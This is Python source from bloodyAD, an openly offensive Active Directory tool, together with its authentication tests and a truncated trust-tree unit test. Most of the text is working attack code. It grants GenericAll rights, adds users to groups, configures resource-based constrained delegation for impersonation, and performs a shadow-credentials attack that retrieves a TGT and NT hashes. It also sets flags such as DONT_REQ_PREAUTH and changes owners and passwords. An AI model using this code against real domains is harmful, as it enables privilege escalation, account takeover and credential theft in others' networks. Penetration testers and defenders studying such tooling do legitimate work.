    ldap_filter = f"(|(name=@)(name={name}))"
    for entry in conn.ldap.bloodysearch(
        zone_dn,
        ldap_filter=ldap_filter,
        search_scope=Scope.SUBTREE,
        attr=["name", "dnsRecord"],
        raw=True,
    ):
        if entry["name"][0] == b"@":
            for raw_record in entry["dnsRecord"]:
                dns_record = dns.Record(raw_record).toDict()
                if dns_record.get("Type") == "SOA":
                    serial = dns_record["Data"]["SerialNo"]
                    break
        else:
            record_dn = entry["distinguishedName"]
            new_dnsrecord_list = entry["dnsRecord"]

    if not serial:
        raise BloodyError(f"No '@' entry found in '{zone_dn}' with '{ldap_filter}'")
    new_dnsrecord = dns.Record()
    new_dnsrecord.fromDict(
        data, dnstype, ttl, rank, serial, preference, port, priority, weight
    )

    if not record_dn:
        record_dn = f"DC={name},{zone_dn}"
        record_attr = {
            "objectClass": ["top", "dnsNode"],
            "dnsRecord": new_dnsrecord.getData(),
            "dNSTombstoned": False,
        }
        conn.ldap.bloodyadd(record_dn, attributes=record_attr)
        LOG.info(f"[+] {name} has been successfully added")
        return

    new_dnsrecord_list.append(new_dnsrecord.getData())

    conn.ldap.bloodymodify(
        record_dn, {"dnsRecord": [(Change.REPLACE.value, new_dnsrecord_list)]}
    )
    LOG.info(f"[+] {name} has been successfully updated")


def genericAll(conn, target: str, trustee: str):
    """
    Give full control to trustee on target and descendants (you must own the object or have WriteDacl)

    :param target: sAMAccountName, DN or SID of the target
    :param trustee: sAMAccountName, DN or SID of the trustee which will have full control on target
    """
    new_sd, _ = utils.getSD(conn, target)
    if "s-1-" in trustee.lower():
        trustee_sid = trustee
    else:
        trustee_sid = next(conn.ldap.bloodysearch(trustee, attr=["objectSid"]))[
            "objectSid"
        ]
    utils.addRight(new_sd, trustee_sid)

    req_flags = msldap.wintypes.asn1.sdflagsrequest.SDFlagsRequestValue(
        {"Flags": accesscontrol.DACL_SECURITY_INFORMATION}
    )
    controls = [("1.2.840.113556.1.4.801", True, req_flags.dump())]

    conn.ldap.bloodymodify(
        target,
        {"nTSecurityDescriptor": [(Change.REPLACE.value, new_sd.getData())]},
        controls,
    )

    LOG.info(f"[+] {trustee} has now GenericAll on {target}")


def groupMember(conn, group: str, member: str):
    """
    Add a new member (user, group, computer) to group

    :param group: sAMAccountName, DN or SID of the group
    :param member: sAMAccountName, DN or SID of the member
    """
    # This is equivalent to classic add member,
    # see [MS-ADTS] - 3.1.1.3.1.2.4 Alternative Forms of DNs
    # But <SID='sid'> also has the advantage of being compatible with foreign security principals,
    # see [MS-ADTS] - 3.1.1.5.3.3 Processing Specifics
    if "s-1-" in member.lower():
        # We assume member is an SID
        member_transformed = f"<SID={member}>"
    else:
        member_transformed = conn.ldap.dnResolver(member)

    conn.ldap.bloodymodify(group, {"member": [(Change.ADD.value, member_transformed)]})
    LOG.info(f"[+] {member} added to {group}")


def rbcd(conn, target: str, service: str):
    """
    Add Resource Based Constraint Delegation for service on target, used to impersonate a user on target with service (Requires "Write" permission on target's msDS-AllowedToActOnBehalfOfOtherIdentity and Windows Server >= 2012)

    :param target: sAMAccountName, DN or SID of the target
    :param service: sAMAccountName, DN or SID of the service account
    """
    control_flag = 0
    new_sd, _ = utils.getSD(
        conn, target, "msDS-AllowedToActOnBehalfOfOtherIdentity", control_flag
    )
    if "s-1-" in service.lower():
        service_sid = service
    else:
        service_sid = next(conn.ldap.bloodysearch(service, attr=["objectSid"]))[
            "objectSid"
        ]
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    utils.addRight(new_sd, service_sid, access_mask)

    conn.ldap.bloodymodify(
        target,
        {
            "msDS-AllowedToActOnBehalfOfOtherIdentity": [
                (
                    Change.REPLACE.value,
                    new_sd.getData(),
                )
            ]
        },
    )

    LOG.info(f"[+] {service} can now impersonate users on {target} via S4U2Proxy")


def shadowCredentials(conn, target: str, path: str = "CurrentPath"):
    """
    Add Key Credentials to target (try to find a suitable DC if provided DC is below Win2016), and use those credentials to retrieve a TGT and a NT hash using PKINIT.

    :param target: sAMAccountName, DN or SID of the target
    :param path: filepath for the generated credentials (TGT ccache or pfx if PKINIT fails)
    """

    dc_dict = collections.defaultdict(dict) 
    # Check if KeyCredential is supported on current DC or find alternative DC
    for dc_info in conn.ldap.bloodysearch("CN=Sites,"+conn.ldap.configNC, "(|(objectClass=nTDSDSA)(objectClass=server))", search_scope=Scope.SUBTREE ,attr=["msDS-Behavior-Version","msDS-HasDomainNCs","objectClass", "dNSHostName"], raw=True):
        if b"nTDSDSA" in dc_info["objectClass"]:
            parent_name = dc_info["distinguishedName"].split(",", 1)[1]
            dc_dict[parent_name]["version"] = int(dc_info["msDS-Behavior-Version"][0])
            dc_dict[parent_name]["domainNCs"] = dc_info["msDS-HasDomainNCs"]
        elif b"server" in dc_info["objectClass"]:
            dc_dict[dc_info["distinguishedName"]]["hostname"] = dc_info["dNSHostName"][0].decode()
    has_KeyCredential = True
    alt_servers = []
    for dn,dc_info in dc_dict.items():
        if dn == conn.ldap._serverinfo["serverName"]:
            if dc_info["version"] < 7:
                has_KeyCredential = False
            else:
                break
        elif dc_info["version"] > 6 and conn.ldap.domainNC.encode() in dc_info.get("domainNCs"):
            alt_servers.append(dc_info["hostname"])

    # If server in forest but not domain with keycredential support, can it be used?
    if not has_KeyCredential:
        LOG.warning(
            "[!] This DC does not seem to support KeyCredentialLink"
        )
        if not alt_servers:
            LOG.error("[!] No DC with Windows Server 2016 or higher found on this domain, operation aborted")
            return

        LOG.info(f"[*] Attempting alternative DCs with KeyCredentialLink support: {alt_servers}")
        record_list = []
        for srv_name in alt_servers:
            record_list.append({"type": ["A"], "name": srv_name})
        host_params = asyncio.get_event_loop().run_until_complete(ldap.findReachableServer(record_list,conn.conf.dns,conn.conf.dcip, [389,636]))
        if not host_params:
            LOG.warning(
                f"[!] No reachable alternative DC found, try to provide one manually in --host or a dns server with --dns"
            )
            return
        schemes = {389: "ldap", 636: "ldaps", 3268: "gc", 3269: "gc-ssl"}
        conn = conn.copy(
                scheme=schemes[host_params["port"]],
                host=host_params["name"],
                dcip=host_params["ip"],
            )

    target_dn = None
    target_sAMAccountName = None
    for entry in conn.ldap.bloodysearch(target, attr=["distinguishedName", "sAMAccountName"]):
        target_dn = entry["distinguishedName"]
        target_sAMAccountName = entry["sAMAccountName"]
    if path == "CurrentPath":
        path = target_sAMAccountName + "_" + "".join(
            random.choice(string.ascii_letters + string.digits) for i in range(2)
        )

    LOG.debug("[*] Generating certificate")

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    subject = x509.Name.from_rfc4514_string(target_dn)
    cert = (
        x509.CertificateBuilder()
        .subject_name(subject)
        .issuer_name(subject)
        .serial_number(x509.random_serial_number())
        .public_key(key.public_key())
        .not_valid_before(datetime.datetime.utcnow())
        .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
        .sign(key, hashes.SHA256())
    )

    LOG.debug("[*] Generating KeyCredential")

    keyCredential = cryptography.KEYCREDENTIALLINK_BLOB()
    keyCredential.keyCredentialLink_from_x509(cert)

    LOG.info(
        "[+] KeyCredential generated with following sha256 of RSA key: %s"
        % binascii.hexlify(keyCredential.getKeyID()).decode()
    )

    LOG.debug("[*] Updating the msDS-KeyCredentialLink attribute of %s" % target)

    key_dnbinary = common.DNBinary()
    key_dnbinary.fromCanonical(keyCredential.getData(), target_dn)
    conn.ldap.bloodymodify(
        target_dn,
        {"msDS-KeyCredentialLink": [(Change.ADD.value, str(key_dnbinary))]},
    )

    LOG.debug("[+] msDS-KeyCredentialLink attribute of the target object updated")

    pfx = serialization.pkcs12.serialize_key_and_certificates(
        name=target_dn.encode(),
        key=key,
        cert=cert,
        cas=None,
        encryption_algorithm=serialization.NoEncryption(),
    )
    pfx_base64 = parse.quote(base64.b64encode(pfx).decode('utf-8'), safe="")

    client = None
    try:
        url = f"kerberos+pfxstr://{conn.conf.domain}\\{target_sAMAccountName}@{conn.conf.dcip}/?certdata={pfx_base64}"
        cu = factory.KerberosClientFactory.from_url(url)
        client = cu.get_client_blocking()
        tgs, enctgs, key, decticket = client.U2U()
    except Exception as e:
        pfx_path = path + ".pfx"
        with open(pfx_path, "wb") as f:
            f.write(pfx)
        LOG.error(f"[-] PKINIT failed on DC {conn.conf.dcip}, you must find a Kerberos server with a certification authority!")
        LOG.info(f"[+] PKINIT PFX certificate saved at: %s" % pfx_path)
        raise e
    finally:
        if client and client.kerberos_TGT:
            ccache_path = path + ".ccache"
            client.ccache.to_file(path + ".ccache")
            LOG.info('[+] TGT stored in ccache file %s' % ccache_path)
        # For the newconn opened if we had to use an alternative DC
        conn.ldap.close()
    
    return [{cred[0]:cred[1]} for cred in ticketutil.get_NT_from_PAC(client.pkinit_tkey, decticket)]

            


def uac(conn, target: str, f: list = None):
    """
    Add property flags altering user/computer object behavior

    :param target: sAMAccountName, DN or SID of the target
    :param f: name of property flag to add, can be called multiple times if multiple flags to add (e.g -f DONT_REQ_PREAUTH  -f DONT_EXPIRE_PASSWORD)
    """
    # TODO: Give scenarios with interesting account control flags

    # List of flags: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties

    # Some flags are computed (so can't be set directly? seems it depends because LOCKOUT can be removed but not added): LOCKOUT, PASSWORD_EXPIRED, PARTIAL_SECRETS_ACCOUNT, USE_AES_KEYS
    # https://learn.microsoft.com/en-us/windows/win32/adschema/a-msds-user-account-control-computed

    # The following flags are mutually exclusives and can't be changed by NetUserSetInfo (so maybe not modifiable at all?):
    # NORMAL_ACCOUNT, TEMP_DUPLICATE_ACCOUNT, WORKSTATION_TRUST_ACCOUNT, SERVER_TRUST_ACCOUNT, INTERDOMAIN_TRUST_ACCOUNT
    # https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/ns-lmaccess-user_info_1008#members

    # Privileges needed for TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION,TRUSTED_FOR_DELEGATION,PASSWD_NOTREQD,DONT_EXPIRE_PASSWD,ENCRYPTED_TEXT_PASSWORD_ALLOWED,SERVER_TRUST_ACCOUNT:
    # https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netusersetinfo#remarks

    uac = 0
    for flag in f:
        uac |= accesscontrol.ACCOUNT_FLAGS[flag]

    try:
        old_uac = next(
            conn.ldap.bloodysearch(target, attr=["userAccountControl"], raw=True)
        )["userAccountControl"][0]
    except IndexError as e:
        for allowed in next(conn.ldap.bloodysearch(target, attr=["allowedAttributes"]))[
            "allowedAttributes"
        ]:
            if "userAccountControl" in allowed:
                raise BloodyError(
                    "Current user doesn't have the right to read userAccountControl on"
                    f" {target}"
                ) from e
        raise BloodyError(f"{target} doesn't have userAccountControl attribute") from e
    uac |= int(old_uac)
    conn.ldap.bloodymodify(
        target, {"userAccountControl": [(Change.REPLACE.value, uac)]}
    )

    LOG.info(f"[-] {f} property flags added to {target}'s userAccountControl")


def user(conn, sAMAccountName: str, newpass: str, ou: str = "DefaultOU", lifetime: int = 0):
    """
    Add a new user

    :param sAMAccountName: sAMAccountName for new user
    :param newpass: password for new user
    :param ou: Organizational Unit for new user
    :param lifetime: lifetime of new user in seconds, if non-zero creates it as a dynamic object
    """
    if ou == "DefaultOU":
        container = None
        for obj in next(
            conn.ldap.bloodysearch(conn.ldap.domainNC, attr=["wellKnownObjects"])
        )["wellKnownObjects"]:
            if "GUID_USERS_CONTAINER_W" == obj.binary_value:
                container = obj.dn
                break
        if not container:
            LOG.warning(
                "Default container for users not found, defaulting to CN=Users,"
                + conn.ldap.domainNC
            )
            container = "cn=Users" + conn.ldap.domainNC
        user_dn = f"cn={sAMAccountName},{container}"
    else:
        user_dn = f"cn={sAMAccountName},{ou}"

    attr = {
        "objectClass": ["top", "person", "organizationalPerson", "user"],
        "distinguishedName": user_dn,
        "sAMAccountName": sAMAccountName,
        "userAccountControl": 544,
        "unicodePwd": '"%s"' % newpass,
    }

    if lifetime > 0:
        attr["objectClass"].append("dynamicObject")
        attr["entryTTL"] = lifetime

    conn.ldap.bloodyadd(user_dn, attributes=attr)
    LOG.info(f"[+] {sAMAccountName} created")



import msldap

from bloodyAD import utils
from bloodyAD.exceptions import LOG
from bloodyAD.formatters import accesscontrol
from bloodyAD.network.ldap import Change, Scope
from msldap.protocol import typeconversion
from msldap.protocol.typeconversion import (
    LDAP_WELL_KNOWN_ATTRS,
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES,
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC
)
from datetime import datetime, timezone, timedelta
import unicodedata



def object(conn, target: str, attribute: str, v: list = [], raw: bool = False):
    """
    Add/Replace/Delete target's attribute

    :param target: sAMAccountName, DN or SID of the target
    :param attribute: name of the attribute
    :param v: add value if attribute doesn't exist, replace value if attribute exists, delete if no value given, can be called multiple times if multiple values to set (e.g -v HOST/janettePC -v HOST/janettePC.bloody.local)
    :param raw: if set, will try to send the values provided as is, without any encoding
    """
    if not raw:
        # We change some encoding functions because for whatever reason some are marked as 'bytes' but are actually 'sd' so can take sddl string
        # but we cannot directly change in msldap because it would break the ones passing directly multi_bytes
        MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC["msDS-AllowedToActOnBehalfOfOtherIdentity"] = typeconversion.multi_sd
        MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC["nTSecurityDescriptor"] = typeconversion.single_sd
        norm_attr = attribute.lower()
        lookup_table = None
        # Order is very important cause there are overlapped with different encoding function values
        for table in [MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC, MSLDAP_BUILTIN_ATTRIBUTE_TYPES, LDAP_WELL_KNOWN_ATTRS]:
            for key in table:
                if key.lower() == norm_attr:
                    attribute = key
                    lookup_table = table
                    break
            if lookup_table:
                break

        if lookup_table:
            encoding_func = lookup_table[attribute]
            str_support = ["utf16le","sid","str","int","guid","sd"]
            encoding_type = encoding_func.__name__.split('_')[1]
            if encoding_type not in str_support:
                LOG.warning(f"[!] Attribute encoding not supported for {attribute} with {encoding_type} attribute type, using raw mode")
                raw = True
        else:
            LOG.warning(f"[!] Attribute encoding not supported for {attribute}, using raw mode")
            raw = True
    # Converting raw str into raw binary
    if raw:
        v = [vstr.encode() for vstr in v]

    conn.ldap.bloodymodify(
        target, {attribute: [(Change.REPLACE.value, v)]}, encode=(not raw)
    )
    LOG.info(f"[+] {target}'s {attribute} has been updated")


def owner(conn, target: str, owner: str):
    """
    Changes target ownership with provided owner (WriteOwner permission required)

    :param target: sAMAccountName, DN or SID of the target
    :param owner: sAMAccountName, DN or SID of the new owner
    """
    new_sid = next(conn.ldap.bloodysearch(owner, attr=["objectSid"]))["objectSid"]

    new_sd, _ = utils.getSD(
        conn, target, "nTSecurityDescriptor", accesscontrol.OWNER_SECURITY_INFORMATION
    )

    old_sid = new_sd["OwnerSid"].formatCanonical()
    if old_sid == new_sid:
        LOG.warning(f"[!] {old_sid} is already the owner, no modification will be made")
    else:
        new_sd["OwnerSid"].fromCanonical(new_sid)

        req_flags = msldap.wintypes.asn1.sdflagsrequest.SDFlagsRequestValue(
            {"Flags": accesscontrol.OWNER_SECURITY_INFORMATION}
        )
        controls = [("1.2.840.113556.1.4.801", True, req_flags.dump())]

        conn.ldap.bloodymodify(
            target,
            {"nTSecurityDescriptor": [(Change.REPLACE.value, new_sd.getData())]},
            controls,
        )

        LOG.info(f"[+] Old owner {old_sid} is now replaced by {owner} on {target}")


# Full info on what you can do:
# https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/change-windows-active-directory-user-password
def password(conn, target: str, newpass: str, oldpass: str = None):
    """
    Change password of a user/computer

    :param target: sAMAccountName, DN or SID of the target
    :param newpass: new password for the target
    :param oldpass: old password of the target, mandatory if you don't have "change password" permission on the target
    """
    encoded_new_password = '"%s"' % newpass
    if oldpass is not None:
        encoded_old_password = '"%s"' % oldpass
        op_list = [
            (Change.DELETE.value, encoded_old_password),
            (Change.ADD.value, encoded_new_password),
        ]
    else:
        op_list = [(Change.REPLACE.value, encoded_new_password)]

    try:
        conn.ldap.bloodymodify(target, {"unicodePwd": op_list})

    except msldap.commons.exceptions.LDAPModifyException as e:
        # Let's check if we comply to pwd policy
        entry = next(
            conn.ldap.bloodysearch(
                target,
                attr=[
                    "msDS-ResultantPSO",
                    "pwdLastSet",
                    "displayName",
                    "sAMAccountName",
                    "sAMAccountType",
                ],
            )
        )
        pwdLastSet = entry.get("pwdLastSet", 0)
        pwdPolicy = None
        error_str = ""
        if "msDS-ResultantPSO" in entry:
            tmpPolicy = next(
                conn.ldap.bloodysearch(
                    entry["msDS-ResultantPSO"],
                    attr=[
                        "msDS-MinimumPasswordAge",
                        "msDS-MinimumPasswordLength",
                        "msDS-PasswordHistoryLength",
                        "msDS-PasswordComplexityEnabled",
                        "name",
                    ],
                )
            )
            pwdPolicy = {
                "minPwdAge": tmpPolicy.get("msDS-MinimumPasswordAge", timedelta()),
                "minPwdLength": tmpPolicy.get("msDS-MinimumPasswordLength", 0),
                "pwdHistoryLength": tmpPolicy.get("msDS-PasswordHistoryLength", 0),
                "pwdComplexity": tmpPolicy.get("msDS-PasswordComplexityEnabled", False),
            }
            # custom password policies are not readable by basic users
            if "name" not in tmpPolicy:
                error_str = (
                    "Password can't be changed. User is subject to the custom password"
                    f" policy {entry['msDS-ResultantPSO'].split(',')[0]} which may be"
                    " more restrictive than the default one."
                )
        else:
            pwdPolicy = next(
                conn.ldap.bloodysearch(
                    conn.ldap.domainNC,
                    attr=[
                        "minPwdAge",
                        "minPwdLength",
                        "pwdHistoryLength",
                        "pwdProperties",
                    ],
                )
            )
            pwdPolicy["pwdComplexity"] = (pwdPolicy["pwdProperties"] & 1) > 0

        # Complexity check
        if pwdPolicy.get("pwdComplexity"):
            tmp_err = "New password doesn't match the complexity:"
            objectName = entry["sAMAccountName"]
            objectDisplayName = entry.get("displayName", "")
            # Checks on name only apply on users not computers idk why
            if (
                entry["sAMAccountType"] == 805306368
                and objectName.upper() in newpass.upper()
            ):
                error_str = (
                    f"{tmp_err} newpass must not include the user's name '{objectName}'"
                    " (case insensitive)."
                )
            elif (
                entry["sAMAccountType"] == 805306368
                and objectDisplayName
                and objectDisplayName.upper() in newpass.upper()
            ):
                error_str = (
                    f"{tmp_err} newpass must not include the user's display name"
                    f" '{objectDisplayName}' (case insensitive)."
                )
            else:
                checks = 0
                if any(char.isupper() for char in newpass):
                    checks += 1
                if any(char.islower() for char in newpass):
                    checks += 1
                if any(char.isdigit() for char in newpass):
                    checks += 1
                if any(char in '-!"#$%&()*,./:;?@[]^_`{|}~+<=>' for char in newpass):
                    checks += 1
                # Any Unicode character that's categorized as an alphabetic character but isn't uppercase or lowercase
                # https://www.unicode.org/reports/tr44/#General_Category_Values
                if any(
                    "L" in unicodedata.category(char)
                    and unicodedata.category(char) not in ["Ll", "Lu"]
                    for char in newpass
                ):
                    checks += 1

                if checks < 3:
                    error_str = (
                        f"{tmp_err} The password must contains characters from three of"
                        " the following categories: Uppercase, Lowercase, Digits,"
                        " Special, Unicode Alphabetic not included in Uppercase and"
                        " Lowercase"
                    )
        # Pwd length check
        if len(newpass) < pwdPolicy.get("minPwdLength", 0):
            error_str += (
                "\nNew password should have at least"
                f" {pwdPolicy['minPwdLength']} characters and not {len(newpass)}"
            )
        # Pwd age check
        if pwdLastSet:
            pwdAge = datetime.now(timezone.utc) - pwdLastSet
            if pwdAge < -pwdPolicy.get("minPwdAge", timedelta()):
                error_str += (
                    "\nPassword can't be changed before"
                    f" {pwdPolicy['minPwdAge'] - pwdAge} because of the minimum"
                    " password age policy."
                )
        # No issue has been found, it may be because of the password history
        if not error_str:
            # If password changed without oldpass, you don't need to respect password history
            if not oldpass:
                error_str = (
                    "Password can't be changed. It may be because the oldpass provided"
                    " is not valid.\nYou can try to use another password change"
                    " protocol such as smbpasswd, server error may be more explicit."
                )
            else:

                if pwdPolicy.get("pwdHistoryLength", 0) > 0:
                    if oldpass == newpass:
                        error_str = "New Password can't be identical to old password."
                    else:
                        error_str = (
                            "Password can't be changed. It may be because the new"
                            " password is already in the password history of the"
                            " target or that the oldpass provided is not valid.\nYou"
                            " can try to use another password change protocol such as"
                            " smbpasswd, server error may be more explicit."
                        )
                else:
                    error_str = (
                        "Password can't be changed. It may be because the oldpass"
                        " provided is not valid.\nYou can try to use another password"
                        " change protocol such as smbpasswd, server error may be more"
                        " explicit."
                    )

        # We can't modify the object on the fly so let's do it on the class :D
        msldap.commons.exceptions.LDAPModifyException.__str__ = lambda self: error_str
        raise e

    LOG.info("[+] Password changed successfully!")
    return True


def restore(conn, target: str, newName: str = None, newParent: str = None):
    """
    Restore a deleted object

    :param target: sAMAccountName (or name for GPO) or SID of the target (shouldn't be sAMAccountName if there is a duplicate)
    :param newName: new name for the restored object (update also sAMAccountName, UPN, SPN...), if not provided will use the last known RDN
    :param newParent: new parent for the restored object, if not provided will use the last known parent
    """
    if target.lower().startswith("s-1-"):
        ldap_filter = f"(objectSid={target})"
    elif target.startswith("{"):
        ldap_filter = f"(name={target})"
    else:
        ldap_filter = f"(sAMAccountName={target})"
    ldap_filter = f"(&{ldap_filter}(isDeleted=TRUE))"
    entry = next(conn.ldap.bloodysearch(
        "CN=Deleted Objects,"+conn.ldap.domainNC, ldap_filter, search_scope=Scope.SUBTREE, attr=["msDS-LastKnownRDN","lastKnownParent", "sAMAccountName", "servicePrincipalName", "userPrincipalName", "name", "dNSHostName", "displayName"], controls=[("1.2.840.113556.1.4.417", True, None)]
    ))# LDAP_SERVER_SHOW_DELETED_OID
    
    new_dn = f"CN={newName if newName else entry.get('msDS-LastKnownRDN',entry['name'])},{newParent if newParent else entry['lastKnownParent']}"
    attributes = {"distinguishedName": [(Change.REPLACE.value, new_dn)],"isDeleted": [(Change.DELETE.value, [])]}
    if newName:
        attributes["name"] = [(Change.REPLACE.value, newName)]
        attributes["displayName"] = [(Change.REPLACE.value, entry["displayName"].replace(entry["name"], newName))]
        if entry.get("sAMAccountName"):
            attributes["sAMAccountName"] = [(Change.REPLACE.value, newName+'$' if entry["sAMAccountName"][-1] == "$" else newName)]
        if entry.get("servicePrincipalName"):
            attributes["servicePrincipalName"] = [(Change.REPLACE.value, [v.replace(entry["name"],newName) for v in entry["servicePrincipalName"]])]
        if entry.get("userPrincipalName"):
            attributes["userPrincipalName"] = [(Change.REPLACE.value, newName + '@' + entry["userPrincipalName"].split('@')[-1])]
        if entry.get("dNSHostName"):
            attributes["dNSHostName"] = [(Change.REPLACE.value, newName + '.' + entry["dNSHostName"].split('.',1)[-1])]

    try:
        conn.ldap.bloodymodify(
            entry["distinguishedName"], attributes, controls=[("1.2.840.113556.1.4.2064", True, None)]
        )
    except msldap.commons.exceptions.LDAPModifyException as e:
        if "userPrincipalName" in str(e.diagnostic_message) and e.resultcode == 19: # 19 is constraintViolation
            LOG.error(
                "[!] Operation failed, the userPrincipalName is probably already used by another non-deleted object, you have the change the other user UPN first (changing UPN of a deleted object is not allowed)"
            )
            return
        raise e

    LOG.info(f"[+] {target} has been restored successfully under {new_dn}")



import unittest
import subprocess
import os
import sys
import json
from pathlib import Path
from bloodyAD.main import main as bloodyAD_main  # Import the main function of bloodyAD

class TestBloodyADAuthentications(unittest.TestCase):
    base_command = ""
    get_object_command = "get object Administrator --attr name"
    tmp_dir = Path(__file__).parent / "tmp"
    crtpass = "P@ssw0rd"

    @staticmethod
    def run_subprocess(command, cwd=None):
        """
        Helper function to run a subprocess command and return its output and exit code.
        """
        result = subprocess.run(
            command,
            shell=True,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
            cwd=cwd,
        )
        if result.returncode != 0:
            raise RuntimeError(f"Command failed: {command}\n{result.stderr}")
        return result.stdout.strip()

    @classmethod
    def setUpClass(cls):
        """
        Set up required files and configurations for the tests.
        """
        # Create tmp directory
        cls.tmp_dir.mkdir(exist_ok=True)

        # Load credentials from secrets.json
        secrets_path = Path(__file__).parent / "secrets.json"
        with secrets_path.open() as f:
            cls.secrets = json.load(f)

        cls.domain = cls.secrets["domain"]
        cls.dc_ip = cls.secrets["pdc"]["ip"]
        cls.hostname = cls.secrets["pdc"]["hostname"]
        cls.admin_user = cls.secrets["admin_user"]["username"]
        cls.admin_password = cls.secrets["admin_user"]["password"]

        cls.base_command = f"--host {cls.hostname} --dc-ip {cls.dc_ip} -d {cls.domain} -u {cls.admin_user} -v DEBUG"

        cls.pfx_file = cls.tmp_dir / "test.pfx"
        cls.pem_file = cls.tmp_dir / "test.pem"
        cls.pem_with_pass = cls.tmp_dir / "test_with_pass.pem"
        cls.pfx_with_pass = cls.tmp_dir / "test_with_pass.pfx"
        cls.ccache_file = cls.tmp_dir / "test.ccache"
        cls.kirbi_file = cls.tmp_dir / "test.kirbi"
        cls.keytab_file = cls.tmp_dir / "test.keytab"

        # Generate a PFX file using certipy
        certipy_command = (
            f"certipy req -target {cls.dc_ip} -ca bloody-MAIN-CA -template User "
            f"-p '{cls.admin_password}' -debug -u '{cls.admin_user}@{cls.domain}' -out {cls.pfx_file.stem}"
        )
        try:
            cls.run_subprocess(certipy_command, cwd=cls.tmp_dir)
            if not cls.pfx_file.exists():
                raise FileNotFoundError(f"PFX file not created: {cls.pfx_file}")
        except Exception as e:
            raise RuntimeError(f"Failed to generate PFX file. Ensure certipy is installed and configured correctly.\n{e}")

        # Convert the PFX to PEM using OpenSSL
        try:
            cls.run_subprocess(
                f"openssl pkcs12 -in {cls.pfx_file} -out {cls.pem_file} -nodes -passin pass:",
                cwd=cls.tmp_dir,
            )
        except RuntimeError as e:
            raise RuntimeError(f"Failed to convert PFX to PEM. Ensure OpenSSL is installed and configured correctly.\n{e}")

        # Add a password to the PEM file
        cls.run_subprocess(
            f"openssl rsa -in {cls.pem_file} -out {cls.pem_with_pass} -aes256 -passout pass:{cls.crtpass}",
            cwd=cls.tmp_dir,
        )

        # Add a password to the PFX file
        cls.run_subprocess(
            f"openssl pkcs12 -export -in {cls.pem_file} -out {cls.pfx_with_pass} -passout pass:{cls.crtpass}",
            cwd=cls.tmp_dir,
        )

        # Retrieve ccache and kirbi files using minikerberos
        cls.run_subprocess(
            f"python3 /mnt/hgfs/bloodyAD-dev/minikerberos/minikerberos/examples/getTGT.py "
            f"'kerberos+password://{cls.domain}\\{cls.admin_user}:{cls.admin_password}@{cls.dc_ip}' "
            f"--ccache {cls.ccache_file} --kirbi {cls.kirbi_file}",
            cwd=cls.tmp_dir,
        )

    def run_bloodyAD(self, args):
        """
        Helper function to call bloodyAD's argparse directly.
        """
        sys.argv = ["bloodyAD.py"] + args.split()
        try:
            bloodyAD_main()
        except SystemExit as e:
            if e.code != 0:
                print(f"Command failed: {' '.join(sys.argv)}")
                raise

    def test_certificate_authentications(self):
        """
        Test certificate-based authentications.
        """
        cert_commands = [
            f"{self.base_command} -c :{self.pfx_file} {self.get_object_command}",
            f"{self.base_command} -c {self.pfx_file} {self.get_object_command}",
            f"{self.base_command} -p {self.crtpass} -c {self.pfx_with_pass} {self.get_object_command}",
            f"{self.base_command} -c :{self.pem_file} {self.get_object_command}",
            f"{self.base_command} -c {self.pem_file} {self.get_object_command}",
        ]
        for command in cert_commands:
            with self.subTest(command=command):
                try:
                    self.run_bloodyAD(command)
                except Exception as e:
                    print(f"Test failed for command: {command}")
                    raise e

    def test_kerberos_authentications(self):
        """
        Test Kerberos-based authentications.
        """
        kerberos_commands = [
            f"{self.base_command} -k ccache={self.ccache_file} {self.get_object_command}",
            f"{self.base_command} -k kirbi={self.kirbi_file} {self.get_object_command}",
        ]
        for command in kerberos_commands:
            with self.subTest(command=command):
                try:
                    self.run_bloodyAD(command)
                except Exception as e:
                    print(f"Test failed for command: {command}")
                    raise e

    @classmethod
    def tearDownClass(cls):
        """
        Clean up generated files if all tests pass.
        """
        if not any(error for _, error in getattr(cls, '_outcome', unittest.TestResult()).errors):
            for file in cls.tmp_dir.iterdir():
                file.unlink()
            cls.tmp_dir.rmdir()


if __name__ == "__main__":
    unittest.main(failfast=True)


import unittest
from bloodyAD import asciitree


class UnitTests(unittest.TestCase):
    def test_01TreeDisplay(self):
        trust_dict = trust_dict = {
            "child.bloody.lab": {
                "bloody.lab": {
                    "distinguishedName": (
                        "CN=bloody.lab,CN=System,DC=child,DC=bloody,DC=lab"
                    ),
                    "trustDirection": [b"3"],
                    "trustPartner": [b"bloody.lab"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"32"],
                }
            },
            "cousin.corp": {
                "bloody.lab": {
                    "distinguishedName": "CN=bloody.lab,CN=System,DC=cousin,DC=corp",
                    "trustDirection": [b"3"],
                    "trustPartner": [b"bloody.lab"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"32"],
                }
            },
            "stranger.lab": {
                "bloody.lab": {
                    "distinguishedName": "CN=bloody.lab,CN=System,DC=stranger,DC=lab",
                    "trustDirection": [b"3"],
                    "trustPartner": [b"bloody.lab"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"8"],
                },
                "cousin.corp": {
                    "distinguishedName": "CN=cousin.corp,CN=System,DC=bloody,DC=lab",
                    "trustDirection": [b"1"],
                    "trustPartner": [b"cousin.corp"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"32"],
                },
                "business.corp": {
                    "distinguishedName": "CN=business.corp,CN=System,DC=bloody,DC=lab",
                    "trustDirection": [b"1"],
                    "trustPartner": [b"business.corp"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"32"],
                },
            },
            "bloody.lab": {
                "child.bloody.lab": {
                    "distinguishedName": (
                        "CN=child.bloody.lab,CN=System,DC=bloody,DC=lab"
                    ),
                    "trustDirection": [b"3"],
                    "trustPartner": [b"child.bloody.lab"],
                    "trustType": [b"2"],
                    "trustAttributes": [b"32"],
